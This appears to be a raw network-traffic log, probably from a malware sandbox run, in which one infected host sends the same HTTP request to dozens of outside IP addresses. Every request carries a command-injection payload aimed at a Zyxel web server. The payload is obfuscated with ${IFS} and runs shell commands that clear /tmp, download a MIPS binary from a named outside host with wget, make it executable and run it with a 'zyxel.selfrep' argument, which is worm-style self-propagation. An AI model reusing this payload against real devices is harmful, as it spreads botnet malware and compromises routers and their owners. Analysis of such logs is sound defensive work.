                                    Jan 13, 2024 19:02:29.064146042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3208192.168.2.1339024216.132.116.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064230919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3209192.168.2.1356400193.38.112.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064280033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3210192.168.2.1358868153.79.54.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064338923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3211192.168.2.1332978116.199.192.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064393997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3212192.168.2.134673619.134.151.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064465046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3213192.168.2.1333632196.10.88.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064493895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3214192.168.2.134154640.136.250.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064538002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3215192.168.2.1347988170.161.38.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064593077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3216192.168.2.1351562175.202.79.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064651012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3217192.168.2.136091431.129.8.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064707994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3218192.168.2.1349914167.199.222.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064757109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3219192.168.2.1350674177.175.168.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064822912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3220192.168.2.1335760145.209.104.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064896107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3221192.168.2.1348292120.86.238.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064941883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3222192.168.2.13517124.2.59.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.064971924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3223192.168.2.1344724220.207.129.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065004110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3224192.168.2.135580093.52.206.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065083981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3225192.168.2.1341416209.216.30.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065152884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3226192.168.2.1345120221.210.10.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065175056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3227192.168.2.1342956175.237.129.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065232038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3228192.168.2.1350846202.194.195.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065283060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3229192.168.2.13478844.156.212.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065365076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3230192.168.2.1356052187.40.247.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065414906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3231192.168.2.1358078222.248.128.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065468073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3232192.168.2.1340806119.222.23.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065509081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3233192.168.2.1360760148.222.42.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065571070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3234192.168.2.1351104182.61.75.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065609932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3235192.168.2.135386248.109.39.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065664053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3236192.168.2.1349300132.166.231.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065702915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3237192.168.2.1354700190.163.26.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065793037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3238192.168.2.13499001.33.68.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065848112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3239192.168.2.1333348196.255.216.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065896034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3240192.168.2.1348394216.226.43.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.065973043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3241192.168.2.1344412185.4.127.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066004992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3242192.168.2.134948451.1.129.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066047907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3243192.168.2.133817487.15.219.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066108942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3244192.168.2.1354488160.190.187.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066180944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3245192.168.2.13370122.245.242.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066246033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3246192.168.2.133846624.250.185.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066296101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3247192.168.2.135848253.86.194.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066329002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3248192.168.2.1335920117.14.116.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066405058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3249192.168.2.134493653.133.108.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066459894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3250192.168.2.135579091.129.151.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066533089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3251192.168.2.1355158102.82.170.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066576958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3252192.168.2.134935474.173.124.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066608906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3253192.168.2.133547227.56.68.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066674948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3254192.168.2.133342272.125.230.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066726923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3255192.168.2.1347776159.13.38.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066781998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3256192.168.2.135986052.109.49.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066826105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3257192.168.2.13582124.78.87.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066895962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3258192.168.2.136094246.116.103.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066953897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3259192.168.2.1353492146.70.166.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.066977978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3260192.168.2.1356202165.228.64.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067089081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3261192.168.2.13330121.38.80.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067138910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3262192.168.2.134118249.186.245.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067241907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3263192.168.2.133636848.195.38.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067313910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3264192.168.2.133551290.107.52.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067362070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3265192.168.2.133977412.176.82.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067416906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3266192.168.2.1341576223.149.56.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067487955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3267192.168.2.133533224.19.13.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067539930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3268192.168.2.133699868.89.64.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067595005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3269192.168.2.1352770155.196.15.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067648888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3270192.168.2.1344840196.97.144.150443
                                    TimestampBytes transferredDirectionData
